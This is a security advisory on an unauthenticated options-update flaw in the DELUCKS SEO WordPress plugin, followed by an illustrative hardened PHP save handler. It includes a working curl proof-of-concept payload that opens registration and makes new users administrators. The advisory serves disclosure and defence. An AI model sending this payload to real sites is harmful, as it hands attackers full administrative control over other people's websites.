DELUCKS SEO [Unauthenticated Options Update]


The DELUCKS SEO plugin performs no security checks when saving options.

On plugin initialization (on every request), it uses the is_admin() function to decide whether the current request comes from a site administrator. is_admin() only reports whether the request targets an administrative page; it does not check who the user is, so it returns true for every request to a wp-admin path, even an unauthenticated one. When is_admin() returns true, the plugin calls the method DPC::saveSettings(). The latter performs no security checks at all before saving various options to the database.

In addition, the option names are taken dynamically from the POST request, so anyone can use a specially crafted POST request to update even core options.


In this proof of concept we change two core options so that registration is open and anyone who registers becomes an administrator.

curl '' \
    -d 'dpc_save_settings=1&dpc[realnames][users_can_register]=1&dpc[realnames][default_role]=administrator'
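
One way the save path could be hardened against the request above, shown as an added example that is not the plugin's own code. The function name, the nonce action and field, the module key and the option names in the allowlist are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened handler, not the plugin's code.
// Assumed names: dpc_hardened_save_settings, DPC_ALLOWED_OPTIONS,
// the nonce action/field, and the module and option names below.

// Fixed allowlist: module key => option names the plugin itself owns.
const DPC_ALLOWED_OPTIONS = array(
    'example_module' => array( 'dpc_example_title_format', 'dpc_example_enabled' ),
);

function dpc_hardened_save_settings() {
    if ( empty( $_POST['dpc_save_settings'] ) ) {
        return;
    }
    // is_admin() only says the request targets wp-admin; check the user instead.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // Reject forged cross-site requests: dies unless a valid nonce is present.
    check_admin_referer( 'dpc_save_settings_action', 'dpc_nonce' );

    $posted = ( isset( $_POST['dpc'] ) && is_array( $_POST['dpc'] ) )
        ? wp_unslash( $_POST['dpc'] )
        : array();

    // Iterate the allowlist, never the POST keys, so names such as
    // users_can_register or default_role are never passed to update_option().
    foreach ( DPC_ALLOWED_OPTIONS as $module => $names ) {
        if ( ! isset( $posted[ $module ] ) || ! is_array( $posted[ $module ] ) ) {
            continue;
        }
        foreach ( $names as $name ) {
            $value = isset( $posted[ $module ][ $name ] ) ? $posted[ $module ][ $name ] : null;
            if ( ! is_scalar( $value ) ) {
                continue; // Skip missing keys and nested arrays.
            }
            update_option( $name, sanitize_text_field( (string) $value ) );
        }
    }
}
// admin_init also fires for unauthenticated requests to wp-admin endpoints,
// which is why the capability check above is required.
add_action( 'admin_init', 'dpc_hardened_save_settings' );
```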